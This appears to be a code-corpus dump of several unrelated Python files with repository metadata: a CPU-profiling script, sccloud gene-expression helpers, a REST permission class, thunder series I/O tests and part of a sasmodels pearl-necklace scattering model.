breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| 40.151163 | 159 | 0.645526 | import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
l = re.findall(r"\d+\.\d+", line)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| true | true |
f7190f849149f54de70d0c91038ddc9c7fabd157 | 10,482 | py | Python | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-29T12:30:28.000Z | 2019-09-20T17:15:35.000Z | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-24T15:07:31.000Z | 2019-08-29T13:57:36.000Z | sccloud/misc/misc.py | klarman-cell-observatory/scCloud.py | 5a04a2f22574db044d018656ac4705ec83840226 | [
"BSD-3-Clause"
] | 3 | 2019-07-24T22:50:34.000Z | 2020-12-08T01:19:34.000Z | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
"""Extract and display gene expressions for each cluster from an `anndata` object.
This function helps to see marker expressions in clusters via the interactive python environment.
Parameters
----------
data: ``anndata.AnnData``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
measure : ``str``, optional, default: ``"percentage"``
Can be either ``"percentage"`` or ``"mean_logExpr"``:
* ``percentage`` shows the percentage of cells expressed the genes;
* ``mean_logExpr`` shows the mean log expression.
Returns
-------
``pandas.DataFrame``
A data frame containing marker expressions in each cluster.
Examples
--------
>>> results = scc.search_genes(adata, ['CD3E', 'CD4', 'CD8'])
"""
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
"""Extract and display differential expression analysis results of markers for each cluster.
This function helps to see if markers are up or down regulated in each cluster via the interactive python environment:
* ``++`` indicates up-regulated and fold change >= threshold;
* ``+`` indicates up-regulated but fold change < threshold;
* ``--`` indicates down-regulated and fold change <= 1 / threshold;
* ``-`` indicates down-regulated but fold change > 1 / threshold;
* ``?`` indicates not differentially expressed.
Parameters
----------
data: ``anndata.Anndata``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
de_test : ``str``, optional, default: ``"fisher"``
Differential expression test to look at, could be either ``t``, ``fisher`` or ``mwu``.
de_alpha : ``float``, optional, default: ``0.05``
False discovery rate.
thre : ``float``, optional, default: ``1.5``
Fold change threshold to determine if the marker is a strong DE (``++`` or ``--``) or weak DE (``+`` or ``-``).
Returns
-------
``pandas.DataFrame``
A data frame containing marker differential expression results for each cluster.
Examples
--------
>>> df = sccloud.misc.search_de_genes(adata, ['CD3E', 'CD4', 'CD8'], thre = 2.0)
"""
columns = [
x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.startswith("percentage_fold_change:")
if de_test == "fisher"
else x.startswith("log_fold_change:")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
""" Show data attributes. For command line use.
"""
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
"""Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.
Parameters
----------
data : `anndata` object
An `anndata` object containing the expression matrix.
glist : `list[str]`
A list of gene symbols.
restriction_vec : `list[str]`
A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
group_str : `str`
How to group selected cells for ANOVA analysis. If group_str is for pseudotime, it has two formats. 1) 'pseudotime:time:n', which divides cells by equal pseudotime invertal; 2) 'pseudotime:size:n' divides cells by equal number of cells.
fdr_alpha : `float`, optional (default: 0.05)
False discovery rate.
res_key : `str`, optional (default: None)
Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.
Returns
-------
`pandas.DataFrame`
Results for genes that pass FDR control.
Examples
--------
>>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
"""
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| 34.367213 | 244 | 0.592253 | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
columns = [
x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.startswith("percentage_fold_change:")
if de_test == "fisher"
else x.startswith("log_fold_change:")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| true | true |
f7190fdf620a3e284b95e4499bf5b802e62fd1c4 | 247 | py | Python | contacts/permissions.py | neyona/underwaterfortunes | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | null | null | null | contacts/permissions.py | neyona/underwaterfortunes | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | 1 | 2020-05-21T13:54:06.000Z | 2020-05-21T13:54:06.000Z | contacts/permissions.py | neyona/underwaterfortunes-2020-version | a48bedc7e25815dea87f743dae21d046d842c713 | [
"MIT"
] | null | null | null | from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| 27.444444 | 56 | 0.716599 | from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| true | true |
f71911522998ef6b2724c6a05886367f69c73b79 | 4,438 | py | Python | test/test_series_io.py | waldo2590/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 650 | 2015-01-21T02:27:58.000Z | 2022-03-01T11:10:44.000Z | test/test_series_io.py | gopikasula/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 264 | 2015-01-20T21:32:41.000Z | 2021-02-28T15:39:01.000Z | test/test_series_io.py | gopikasula/thunder | 967ff8f3e7c2fabe1705743d95eb2746d4329786 | [
"Apache-2.0"
] | 179 | 2015-01-20T10:02:04.000Z | 2021-02-24T12:59:58.000Z | import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| 31.475177 | 79 | 0.627084 | import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| true | true |
f719124569af67768775e9d2f1c0b713b0b7a884 | 4,855 | py | Python | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | null | null | null | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | null | null | null | sasmodels/models/pearl_necklace.py | jmborr/sasmodels | bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9 | [
"BSD-3-Clause"
] | 1 | 2021-04-28T14:21:17.000Z | 2021-04-28T14:21:17.000Z | r"""
This model provides the form factor for a pearl necklace composed of two
elements: *N* pearls (homogeneous spheres of radius *R*) freely jointed by *M*
rods (like strings - with a total mass *Mw* = *M* \* *m*\ :sub:`r` + *N* \* *m*\
:sub:`s`, and the string segment length (or edge separation) *l*
(= *A* - 2\ *R*)). *A* is the center-to-center pearl separation distance.
.. figure:: img/pearl_necklace_geometry.jpg
Pearl Necklace schematic
Definition
----------
The output of the scattering intensity function for the pearl_necklace is
given by (Schweins, 2004)
.. math::
I(q)=\frac{ \text{scale} }{V} \cdot \frac{(S_{ss}(q)+S_{ff}(q)+S_{fs}(q))}
{(M \cdot m_f + N \cdot m_s)^2} + \text{bkg}
where
.. math::
S_{ss}(q) &= sm_s^2\psi^2(q)[\frac{N}{1-sin(qA)/qA}-\frac{N}{2}-
\frac{1-(sin(qA)/qA)^N}{(1-sin(qA)/qA)^2}\cdot\frac{sin(qA)}{qA}] \\
S_{ff}(q) &= sm_r^2[M\{2\Lambda(q)-(\frac{sin(ql/2)}{ql/2})\}+
\frac{2M\beta^2(q)}{1-sin(qA)/qA}-2\beta^2(q)\cdot
\frac{1-(sin(qA)/qA)^M}{(1-sin(qA)/qA)^2}] \\
S_{fs}(q) &= m_r \beta (q) \cdot m_s \psi (q) \cdot 4[
\frac{N-1}{1-sin(qA)/qA}-\frac{1-(sin(qA)/qA)^{N-1}}{(1-sin(qA)/qA)^2}
\cdot \frac{sin(qA)}{qA}] \\
\psi(q) &= 3 \cdot \frac{sin(qR)-(qR)\cdot cos(qR)}{(qR)^3} \\
\Lambda(q) &= \frac{\int_0^{ql}\frac{sin(t)}{t}dt}{ql} \\
\beta(q) &= \frac{\int_{qR}^{q(A-R)}\frac{sin(t)}{t}dt}{ql}
where the mass *m*\ :sub:`i` is (SLD\ :sub:`i` - SLD\ :sub:`solvent`) \*
(volume of the *N* pearls/rods). *V* is the total volume of the necklace.
The 2D scattering intensity is the same as $P(q)$ above, regardless of the
orientation of the *q* vector.
The returned value is scaled to units of |cm^-1| and the parameters of the
pearl_necklace model are the following
NB: *num_pearls* must be an integer.
References
----------
R Schweins and K Huber, *Particle Scattering Factor of Pearl Necklace Chains*,
*Macromol. Symp.* 211 (2004) 25-42 2004
"""
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
